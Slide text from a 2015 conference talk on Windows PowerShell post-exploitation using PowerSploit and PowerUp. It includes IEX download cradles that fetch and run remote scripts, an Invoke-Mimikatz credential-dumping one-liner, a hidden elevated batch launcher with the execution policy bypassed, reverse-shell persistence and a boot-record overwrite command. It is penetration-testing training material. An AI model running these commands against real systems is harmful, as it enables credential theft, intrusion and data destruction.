post-exploitation with windows powershell · pdf filejerold hoong, oscp associate, singapore...

Jerold Hoong, OSCP

Associate, Singapore

27th May 2015

ASPAC Hacknet Conference and Security Training

POST-EXPLOITATIONWITH WINDOWS POWERSHELL

© 2014 KPMG Asia Pacific Limited, a limited liability and a member firm of the KPMG network of independent member firms affiliated with KPMG International Cooperative (“KPMG International”), a Swiss entity. All rights reserved.

1

Agenda

No. CHAPTER

1 PowerShell 101

2 Exploitation Frameworks

3 Overview on PowerSploit and Veil-PowerTools’s PowerUpModule

4 Installing PowerSploit / PowerUp

5 Network of Demo Scenario

6 Demo

7 Next Steps?

8 Questions and Answers

~EOF~


2

Click to edit Master title style

This presentation will showcase the use of PowerShell scripting exploitation frameworks coupled with various penetration testing tools and AV evasion techniques for post-exploitation on compromised hosts.

Mimikatz

What is this presentation about?


3

PowerShell 101

• Similar to Unix’s Bash Shell, aka Bash for Windows

• Task-based command-line shell and scripting language

• Installed by default on Windows Server 2008, 2012, 7, 8 and 10

• Used by system administrators to automate tasks and configure windows servers

What is PowerShell?

• Provides access to almost everything on a Window’s platform

• Supported on Windows XP

• Easy to learn and powerful

• Has the ability to execute scripts in memory (AV evasion)

• Has a powerful scripting environment bundled together (PowerShell ISE)

Why use PowerShell as an attacker?


4

Exploitation Frameworks

• Collection of Microsoft PowerShell modules and scripts that can be used to aid penetration testers during all phases of an assessment.

• Available in Kali Linux by default at /usr/share/powersploit (git clone to get the “bleeding edge”).

• Written by Matt Graeber.

PowerSploit

• Collection of PowerShell modules and scripts with a focus on offensive operations.

• Consists of PewPewPew, PowerBreach, PowerPick, PowerUp and PowerViewcomponents.

• The PowerUp component will be shown in the demo later.

• Written by @harmj0y and @sixdub.

Veil-PowerTools

• Framework and collection of scripts and payloads which enables usage of PowerShell for offensive security and post exploitation.

• Written by Nikhil Mittal.

Nishang


5

Overview of PowerSploit

• Code Execution (DLL and Shellcode Injection)

• Script Modification (Script encryption, encoding and compression utility)

• Persistence (Backdoor)

• Antivirus Bypass

• Exfiltration

• Mayhem

• Recon

Categories of PowerShell Scripts in PowerSploit

• The Invoke-Shellcode function available from the Invoke-Shellcode.ps1 script allows injection of shellcode into the process ID of your choice or into PowerShelllocally.

• This functionality will be demonstrated in the demo scenario later.

Code Execution – Invoke-Shellcode


6

Overview of Veil-PowerTools’s PowerUp

• PowerUp was created to allow a clean way to audit client systems for common Windows privilege escalation vectors. It utilizes various service abuse checks, .dllhijacking opportunities, registry checks, and more to enumerate common ways that you might be able to elevate on a target system.

PowerUp!

• Service Enumeration

• Service Abuse

• DLL Hijacking

• Registry Checks

• Misc. Checks

• More on this in the demo later.

Module Functions


7

Installing PowerSploit / PowerUp

It is simple:• git clone: https://github.com/mattifestation/PowerSploit• git clone: https://github.com/Veil-Framework/PowerTools/tree/master/PowerUp

Alternatively, you can download the zip archive directly from GitHub.

https://github.com/mattifestation/PowerSploit

https://github.com/Veil-Framework/PowerTools/tree/master/PowerUp


8

Importing Modules and Scripts

There are 2 ways to import modules and scripts:

1. Normal way, requires module/script to be on the host locally.

• Import-Module <Module/Script>

OR

2. Quick way, module/script can be at a remote location and imported into PowerShell’s memory context using the IEX download cradle:

• IEX (New-Object Net.Webclient).DownloadString(“http://SERVER/script.ps1”)


9

Importing Modules and Scripts

Using the IEX cradle to download and load a script straight from GitHub


10

Network of Demo Scenario

Network: 192.168.56.0/24

VICTIMWINDOWS PC192.168.56.101

ATTACKERKALI LINUX

192.168.56.103

Simplified Demo Scenario


11

Techniques Covered in the Demo

• Conducting discovery scans with ARP and port scanner tools

Pre- Exploitation Reconnaissance

• Identifying current available privileges

• Checking running services for misconfigurations

• Obtaining a stealthy meterpreter shell

• Using ring0 kernel exploits for privilege escalation

Post-Exploitation with Limited Access User

Account

• Dumping account credentials with the mimikatz tool

• Enabling RDP remotely to gain interactive access

• Running exfiltration tools like keyloggers

Post-Exploitation with Full Administrator Account


12

Demo


13

Demo – srvcheck3.exe Sample Output


14

Next Steps?

Now that we have full administrator access, what else could PowerSploit do? You can experiment with the different modules, such as:

Persistence.ps1• Allows you to have persistent access to the compromised host, such as automatically running a reverse tcp shell connection back to your attacking Kali Host every time a victim user logs in successfully.


15

Next Steps?

Invoke-Mimikatz.ps1

Dump Windows credentials using Mimikatz, which we already did with the msfconsole.

• Example: powershell “IEX (New-Object Net.Webclient).DownloadString("https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1"); Invoke-Mimikatz -DumpCreds”


16

Next Steps?

Example:

-passwd.bat

@ECHO OFFPowerShell.exe -windowstyle hidden -NoProfile -Command "& {Start-Process PowerShell.exe -ArgumentList '-windowstyle hidden -NoProfile -ExecutionPolicyBypass -File ""%~dpn0.ps1""' -Verb RunAs}“

-passwd.ps1

$ScriptPath = Split-Path -parent $MyInvocation.MyCommand.Definition

IEX (New-Object Net.Webclient).DownloadString("https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1")Invoke-Mimikatz -DumpCreds > $scriptPath/pass.txt


17

Next Steps?

Invoke-Portscan.ps1 (Alternative if no Nmap is installed on compromised host)

Conduct further recon on compromised host’s network.

• Example: Invoke-Portscan -Hosts 192.168.1.1/24 -T 4 -TopPorts 25 -oA localnet


18

Next Steps?

Mayhem Module:

• Set-MasterBootRecord -BootMessage “”

~Quick Demo~


19

Questions?


20

Sources and References

No URL

1 www.trustedsec.com/files/PowerShell_Defcon.pdf

2 https://github.com/Veil-Framework/PowerTools

3 http://www.powershelladmin.com/wiki/Ascii_art_characters_powershell_script

4 https://www.pentestgeek.com/2013/09/18/invoke-shellcode/

5 https://www.fishnetsecurity.com/6labs/blog/how-post-ex-persistence-scripting-powersploit-veil

6 http://www.harmj0y.net/blog/category/powershell/

7 https://raw.githubusercontent.com/Veil-Framework/PowerTools/master/PowerUp/README.md


21

~EOF~

Thank you

Presentation by Jerold Hoong

© 2015 KPMG LLP, a UK limited liability partnership, is a subsidiary of KPMG Europe LLP and a member firm of the KPMG network of independent member firms affiliated with KPMG International Cooperative, a Swiss entity. All rights reserved.

The KPMG name, logo and “cutting through complexity” are registered trademarks or trademarks of KPMG International Cooperative (KPMG International).

post-exploitation with windows powershell · pdf filejerold hoong, oscp associate, singapore...

Documents